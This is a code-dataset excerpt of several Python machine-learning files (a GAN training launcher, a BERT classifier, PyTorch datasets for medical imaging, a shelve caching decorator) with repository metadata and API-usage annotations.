torch.multiprocessing.set_start_method('spawn', force=True)
with tempfile.TemporaryDirectory() as temp_dir:
torch.multiprocessing.spawn(fn=subprocess_fn, args=(config, args, temp_dir), nprocs=gpus)
def parse_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--config_path', type=str, default='experiments/default_dist.yaml')
parser.add_argument('--name', type=str, default='default_dist')
parser.add_argument('--pipe', action='store_true', help='read config from stdin instead of file')
parser.add_argument('--suppress', action='store_true')
return parser.parse_args()
if __name__ == '__main__':
launch_training(parse_args())
|
studio-YAIVERSE/studio-YAIVERSE
|
train_nada.py
|
train_nada.py
|
py
| 13,226 |
python
|
en
|
code
| 20 |
github-code
|
6
|
[
{
"api_name": "model_engine.find_get3d",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "logging.StreamHandler",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "logging.FileHandler",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "time.strftime",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "time.gmtime",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "dist_util.setup_dist",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "torch_utils.custom_ops.verbosity",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "torch_utils.custom_ops",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "nada.YAIverseGAN",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "functional.unfreeze_generator_layers",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "dist_util.get_world_size",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "torch.nn.parallel.DistributedDataParallel",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "dist_util.dev",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "dist_util.dev",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "torch.optim.Adam",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 94,
"usage_type": "attribute"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 102,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "torch.manual_seed",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 109,
"usage_type": "attribute"
},
{
"api_name": "torch.randn",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "torch.Generator",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "torch.nn.utils.clip_grad_norm_",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 154,
"usage_type": "attribute"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "functional.generate_custom",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.save_image",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 179,
"usage_type": "attribute"
},
{
"api_name": "torch.save",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "torch.cuda.empty_cache",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 196,
"usage_type": "attribute"
},
{
"api_name": "dist_util.barrier",
"line_number": 198,
"usage_type": "call"
},
{
"api_name": "torch.topk",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 210,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "torch.nn.utils.clip_grad_norm_",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 229,
"usage_type": "attribute"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 234,
"usage_type": "call"
},
{
"api_name": "torch.save",
"line_number": 237,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "functional.generate_custom",
"line_number": 249,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.save_image",
"line_number": 260,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 262,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 262,
"usage_type": "attribute"
},
{
"api_name": "torch.save",
"line_number": 272,
"usage_type": "call"
},
{
"api_name": "torch.save",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "torch.cuda.empty_cache",
"line_number": 292,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 292,
"usage_type": "attribute"
},
{
"api_name": "dist_util.barrier",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 298,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 302,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 303,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 304,
"usage_type": "call"
},
{
"api_name": "functional.generate_custom",
"line_number": 305,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.save_image",
"line_number": 310,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 312,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 312,
"usage_type": "attribute"
},
{
"api_name": "yaml.safe_load",
"line_number": 324,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 324,
"usage_type": "attribute"
},
{
"api_name": "yaml.safe_load",
"line_number": 327,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing.set_start_method",
"line_number": 337,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing",
"line_number": 337,
"usage_type": "attribute"
},
{
"api_name": "tempfile.TemporaryDirectory",
"line_number": 338,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing.spawn",
"line_number": 339,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing",
"line_number": 339,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 344,
"usage_type": "call"
}
] |
32005344445
|
import torch.nn as nn
from transformers import BertModel
from services.text_similarity.settings import Settings
class BERTClassifier(nn.Module):
def __init__(self, freeze_params=False):
super(BERTClassifier, self).__init__()
self.settings = Settings
self.bert = BertModel.from_pretrained(self.settings.checkpoint, return_dict=False)
# adding custom layers according to the problem statement
# self.classifier = nn.Sequential(
# nn.Linear(self.settings.input_dim, self.settings.hidden_dim),
# nn.ReLU(),
# nn.Linear(self.settings.hidden_dim, self.settings.output_dim)
# )
if not freeze_params:
# freeze all the parameters
for param in self.bert.parameters():
param.requires_grad = False
self.bert_drop = nn.Dropout(self.settings.dropout)
self.out = nn.Linear(self.settings.input_dim, self.settings.output_dim)
def forward(self, ids, mask, token_type_ids):
o1, o2 = self.bert(
ids,
attention_mask=mask,
token_type_ids=token_type_ids
)
bo = self.bert_drop(o2)
output = self.out(bo)
return output
def print_model_details(self):
# Get all of the model's parameters as a list of tuples.
params = list(self.bert.named_parameters())
print('The BERT Base Uncased Model Has {:} different named parameters.\n'.format(len(params)))
print('==== Embedding Layer ====\n')
for p in params[0:5]:
print("{:<55} {:>12}".format(p[0], str(tuple(p[1].size()))))
print('\n==== First Transformer ====\n')
for p in params[5:21]:
print("{:<55} {:>12}".format(p[0], str(tuple(p[1].size()))))
print('\n==== Output Layer ====\n')
for p in params[-4:]:
print("{:<55} {:>12}".format(p[0], str(tuple(p[1].size()))))
|
R-aryan/Text-Similarity-Using-BERT
|
backend/services/text_similarity/application/ai/model.py
|
model.py
|
py
| 1,945 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torch.nn.Module",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "services.text_similarity.settings.Settings",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "transformers.BertModel.from_pretrained",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "transformers.BertModel",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "torch.nn.Dropout",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 26,
"usage_type": "name"
}
] |
32397358077
|
import os
import random
import numpy as np
import torch
from scipy import ndimage as ndi
from torch.nn import functional as F
from torch.utils.data import Dataset
from my_utils import normalize
class UNetDataset(Dataset):
def __init__(self, data_dir, shape, train, transform):
self.shape = shape
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
self.mask_path = os.path.join(data_dir, 'masks')
self.train = train
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
mask = np.load(os.path.join(self.mask_path, self.sample_files[index]))
mask = mask.astype(np.float32)
if int(self.sample_files[index][-6:-4]) == 0:
rand = random.randrange(3, len(sample) - 3)
sample = sample[rand - 3:rand + 4]
mask = mask[rand]
if self.transform is not None:
sample = self.transform(sample)
sample = np.concatenate((sample[0], sample[1]))
if self.train:
htranslation = random.randint(-10, 10)
vtranslation = random.randint(-10, 10)
angle = random.randint(-10, 10)
sample = ndi.shift(sample, (0, htranslation, vtranslation), mode='nearest')
sample = ndi.rotate(sample, angle, (-1, -2), mode='nearest', reshape=False)
mask = ndi.shift(mask, (htranslation, vtranslation), mode='nearest')
mask = ndi.rotate(mask, angle, (-1, -2), mode='nearest', reshape=False)
if random.randint(0, 1) == 1:
sample = np.flip(sample, -1)
mask = np.flip(mask, -1)
sample = torch.from_numpy(sample[np.newaxis, ...].copy())
sample = F.interpolate(sample, self.shape, mode='bilinear', align_corners=False)
mask = torch.from_numpy(mask[np.newaxis, np.newaxis, ...].copy())
mask = F.interpolate(mask, self.shape, mode='nearest')
mask2 = F.interpolate(mask, scale_factor=0.5, mode='nearest', recompute_scale_factor=False)
mask3 = F.interpolate(mask, scale_factor=0.25, mode='nearest', recompute_scale_factor=False)
return sample[0], mask[0], mask2[0], mask3[0]
class GenesisDataset2D(Dataset):
def __init__(self, data_dir, shape, transform, flip_rate):
self.shape = shape
self.transform = transform
self.flip_rate = flip_rate
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
x = np.load(os.path.join(self.sample_path, self.sample_files[index]))
rand = random.randrange(3, len(x) - 3)
x = x[rand - 3:rand + 4]
if random.random() < self.flip_rate:
x = np.flip(x, -1)
x = normalize(x)
x = np.concatenate((x[0], x[1]))
x = ndi.zoom(x, (1, self.shape[0] / x.shape[1], self.shape[1] / x.shape[2]), order=2, mode="nearest")
y = self.transform(x)
return torch.from_numpy(y.copy().astype(np.float32)), torch.from_numpy(x.copy().astype(np.float32))
class PPos2DDataset(Dataset):
def __init__(self, data_dir, shape, num_classes, transform):
self.shape = shape
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
self.num_classes = num_classes
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
rand = random.randrange(3, len(sample) - 3)
target = (rand - 3) / (len(sample) - 6)
sample = sample[rand - 3:rand + 4]
if self.transform is not None:
sample = self.transform(sample)
sample = np.concatenate((sample[0], sample[1]))
return torch.from_numpy(sample), torch.tensor([target])
class UNetClassifierDataset(Dataset):
def __init__(self, data_dir, train, transform):
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
self.mask_path = os.path.join(data_dir, 'masks')
self.train = train
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
mask = np.load(os.path.join(self.mask_path, self.sample_files[index]))
mask = mask.astype(np.float32)
if self.transform is not None:
sample = self.transform(sample)
if self.train:
htranslation = random.randint(-10, 10)
vtranslation = random.randint(-10, 10)
dtranslation = random.randint(-2, 2)
angle = random.randint(-10, 10)
sample = ndi.shift(sample, (0, dtranslation, htranslation, vtranslation), mode='nearest')
sample = ndi.rotate(sample, angle, (-1, -2), mode='nearest', reshape=False)
mask = ndi.shift(mask, (dtranslation, htranslation, vtranslation), mode='nearest')
mask = ndi.rotate(mask, angle, (-1, -2), mode='nearest', reshape=False)
if random.randint(0, 1) == 1:
sample = np.flip(sample, -1)
mask = np.flip(mask, -1)
mask2 = ndi.zoom(mask, 0.5, order=0, mode='nearest')
mask3 = ndi.zoom(mask, 0.25, order=0, mode='nearest')
return torch.from_numpy(sample.copy()), torch.from_numpy(mask[np.newaxis, ...].copy()), torch.from_numpy(
mask2[np.newaxis, ...].copy()), torch.from_numpy(mask3[np.newaxis, ...].copy()), torch.tensor(
[self.sample_files[index][:5].isdigit()], dtype=torch.float)
# return torch.from_numpy(sample.copy()), torch.from_numpy(mask[np.newaxis, ...].copy()), torch.from_numpy(
# mask2[np.newaxis, ...].copy()), torch.from_numpy(mask3[np.newaxis, ...].copy()), torch.tensor(
# [self.sample_files[index][6:11].isdigit()], dtype=torch.float)
class ClassifierDataset(Dataset):
def __init__(self, data_dir, shape, train, transform=None):
self.shape = shape
self.train = train
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
if train:
self.mask_path = os.path.join(data_dir, 'masks')
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
if self.train and self.sample_files[index][-5] == '1':
mask = np.load(os.path.join(self.mask_path, self.sample_files[index]))
indices = mask.nonzero()
nodule_length = [0, 0, 0]
scale_length = [0, 0, 0]
for i in range(3):
start = np.min(indices[i])
end = np.max(indices[i]) + 1
nodule_length[i] = end - start
while True:
for i in range(3):
while True:
scale_length[i] = round(nodule_length[i] * random.uniform(1, 3))
if scale_length[i] < sample.shape[i]:
break
depth = random.randint(0, sample.shape[0] - scale_length[0])
height = random.randint(0, sample.shape[1] - scale_length[1])
width = random.randint(0, sample.shape[2] - scale_length[2])
if depth > np.max(indices[0]) or depth + scale_length[0] < np.min(indices[0]) or height > np.max(
indices[1]) or height + \
scale_length[1] < np.min(indices[1]) or width > np.max(indices[2]) or width + scale_length[2] < \
np.min(indices[2]):
sample = sample[depth:depth + scale_length[0], height:height + scale_length[1],
width:width + scale_length[2]]
break
if self.transform is not None:
sample = self.transform(sample)
sample = torch.from_numpy(sample[np.newaxis, ...].copy())
sample = F.interpolate(sample, self.shape, mode='trilinear', align_corners=True)
return sample[0], torch.tensor([self.sample_files[index][-5] == '0'], dtype=torch.float)
class PCL2DDataset(Dataset):
def __init__(self, data_dir, shape, transform):
self.shape = shape
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
rand = random.randrange(3, len(sample) - 3)
slice_position = (rand - 3) / (len(sample) - 6)
partition = int((rand - 3) / (len(sample) - 6) * 4) + 1
sample = sample[rand - 3:rand + 4]
img1 = self.transform(sample)
img2 = self.transform(sample)
img1 = np.concatenate((img1[0], img1[1]))
img2 = np.concatenate((img2[0], img2[1]))
return torch.from_numpy(img1), torch.from_numpy(img2), torch.tensor(slice_position), torch.tensor(partition)
|
alienzyj/PPos
|
my_dataset.py
|
my_dataset.py
|
py
| 10,080 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torch.utils.data.Dataset",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "numpy.float32",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 57,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 77,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "random.random",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "my_utils.normalize",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.zoom",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 87,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 91,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 94,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 98,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 107,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 107,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 107,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 120,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 123,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 126,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 133,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 133,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 133,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 134,
"usage_type": "attribute"
},
{
"api_name": "numpy.float32",
"line_number": 135,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 143,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 146,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 148,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 149,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 152,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 153,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.zoom",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 155,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.zoom",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 156,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 158,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 158,
"usage_type": "attribute"
},
{
"api_name": "numpy.newaxis",
"line_number": 159,
"usage_type": "attribute"
},
{
"api_name": "torch.from_numpy",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "torch.float",
"line_number": 160,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 167,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 172,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 177,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 183,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 185,
"usage_type": "attribute"
},
{
"api_name": "numpy.min",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 200,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 204,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 204,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 205,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 213,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 214,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 214,
"usage_type": "name"
},
{
"api_name": "torch.tensor",
"line_number": 216,
"usage_type": "call"
},
{
"api_name": "torch.float",
"line_number": 216,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 219,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 223,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 223,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 231,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 231,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 231,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 240,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 243,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 243,
"usage_type": "call"
}
] |
8560654831
|
"""Bad style, but I don't know better where to put this."""
import logging
import shelve
from functools import wraps
logger = logging.getLogger(__name__)
def shelve_memoize(filename):
"""On-disk cache decorator using shelve."""
def decorator_shelve_memoize(func):
@wraps(func)
def wrapper_shelve_memoize(arxiv_id, *args, **kwargs):
assert len(args) == 0
assert len(kwargs) == 0
with shelve.open(filename) as db: # noqa: S301
if arxiv_id not in db:
logger.debug(f"{arxiv_id} was not found in the local metadata db. Requesting…")
db[arxiv_id] = func(arxiv_id)
return db.get(arxiv_id)
return decorator_shelve_memoize
|
leogott/document-clustering
|
utils.py
|
utils.py
|
py
| 755 |
python
|
en
|
code
| null |
github-code
|
6
|
[
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "shelve.open",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "functools.wraps",
"line_number": 12,
"usage_type": "call"
}
] |
42786347897
|
import os
import math
import glob
import time
import random
import torch
from PIL import Image
from torch.utils import data
from torchvision.transforms import RandomCrop
import numpy as np
import core.io as io
import core.clip_utils as cu
import multiprocessing as mp
class CachedAVSource(data.Dataset):
def __init__(self):
# Cached data
self.entity_data = {}
self.speech_data = {}
self.entity_list = []
#Reproducibilty
random.seed(42)
np.random.seed(0)
